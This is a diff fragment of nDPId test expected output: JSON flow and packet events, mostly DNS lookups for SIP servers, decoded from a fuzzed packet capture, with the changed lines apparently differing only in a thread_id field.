00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470666318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470666318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470666318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470666318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -959,8 +959,8 @@
00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"re-.sippstar.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"re-.sippstar.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1120470765675,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470765675,"pkt":"AEtUADRWAODtAW69CABFAAA+a5AAAIARS8vAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXC6c3RhcgNjb20AAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1120470765675,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470765675,"pkt":"AEtUADRWAODtAW69CABFAAA+a5AAAIARS8vAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXC6c3RhcgNjb20AAAEAAQ=="}
00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470764674,"flow_last_seen":1120470765675,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470765675,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sip?star.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470764674,"flow_last_seen":1120470765675,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470765675,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sip?star.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00401{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120470765675,"pkt":"ADBUADRWAODtAW69CABFAAA+a5EABGQRS8rAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXBwc3RhcgNjb20AAAEAAQ=="} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120470765675,"pkt":"ADBUADRWAODtAW69CABFAAA+a5EABGQRS8rAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlZwhzaXBwc3RhcgNjb20AAAEAAQ=="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120470767678} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":492,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120470767678}
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1120470768028,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1120470768028,"pkt":"AODtAW69ADBUADRWCABFAACbAABAAGcRtv7AqAEBwKgBAgA1CukAh65F6OyBgAABAAEAAgACA3JlZwhzaXBwc3RhcgNjb20AAAEAAcAMAAEAAQAAAlgABFJi0SfAEAACAAEAAAJYAA8CbnMGaHNwZWVkA25ldADAEAACAAEAAAJYAAYDbnMzwEHAPgABAAEAAAUPAAQ+XcA7wFkAAQABAAAFDwAE1d1SAg=="} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1120470768028,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1120470768028,"pkt":"AODtAW69ADBUADRWCABFAACbAABAAGcRtv7AqAEBwKgBAgA1CukAh65F6OyBgAABAAEAAgACA3JlZwhzaXBwc3RhcgNjb20AAAEAAcAMAAEAAQAAAlgABFJi0SfAEAACAAEAAAJYAA8CbnMGaHNwZWVkA25ldADAEAACAAEAAAJYAAYDbnMzwEHAPgABAAEAAAUPAAQ+XcA7wFkAAQABAAAFDwAE1d1SAg=="}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470768028,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sippstar.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.98.209.39"}} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":493,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470768028,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"reg.sippstar.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.98.209.39"}}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -977,8 +977,8 @@
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1120470776050,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470776050,"pkt":"ADBUADRWAODtAW69CABFAAA+a20AAIARS8bAqAECwKgBAQrrADUAKvLQ4u8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1120470776050,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470776050,"pkt":"ADBUADRWAODtAW69CABFAAA+a20AAIARS8bAqAECwKgBAQrrADUAKvLQ4u8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1120470777132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470777132,"pkt":"ADBUADRWAODtAW69CABFAAA+a5YAAIARS8XAqAECwKgBAQrqADUAKnjTXO4BAAABAAAAAAAQA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1120470777132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470777132,"pkt":"ADBUADRWAODtAW69CABFAAA+a5YAAIARS8XAqAECwKgBAQrqADUAKnjTXO4BAAABAAAAAAAQA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1120470778053,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+a5cAAIARS8TAqAECwKgBAQrrADUAKvLQ4m8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1120470778053,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+a5cAAIARS8TAqAECwKgBAQrrADUAKvLQ4m8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
00401{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+ayVzAIARS8PAqAECwKgBAQrqADUAKnjTXO4BAAABAAAABAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+ayVzAIARS8PAqAECwKgBAQrqADUAKnjTXO4BAAABAAAABAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120470779135} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120470779135}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":503,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470779408,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":503,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470779408,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1120470779409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":1120470779409,"pkt":"ACjtAW69ADBUADRWCABFAAByAABAAEARtyfAqAEBwKgBAgA1CuoAXlCmXO6BgAABAAEAAgAAA3NpcAljeWJlcmNpdHkCZGsAAAECAcAMAAEAAQAAASwABNTyISPAEAACAAEAAAEsAAYDbnMywBDAEAACAAEAAAEsAAYDbnMxwBA="} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1120470779409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":1120470779409,"pkt":"ACjtAW69ADBUADRWCABFAAByAABAAEARtyfAqAEBwKgBAgA1CuoAXlCmXO6BgAABAAEAAgAAA3NpcAljeWJlcmNpdHkCZGsAAAECAcAMAAEAAQAAASwABNTyISPAEAACAAEAAAEsAAYDbnMywBDAEAACAAEAAAEsAAYDbnMxwBA="}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470779409,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470779409,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
@@ -991,8 +991,8 @@
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1120470781608,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470781608,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa5wAAIARSrHAqKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1120470781608,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470781608,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa5wAAIARSrHAqKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1120470782692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAABIa54AAIARS7PAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1120470782692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAABIa54AAIARS7PAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAAB6a58AAIARS7LAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAAJF9zaXAEX3VkcANzaXAJeXliZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAAB6a58AAIARS7LAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAAJF9zaXAEX3VkcANzaXAJeXliZXJjaXR5AmRrAAAhAAE="}
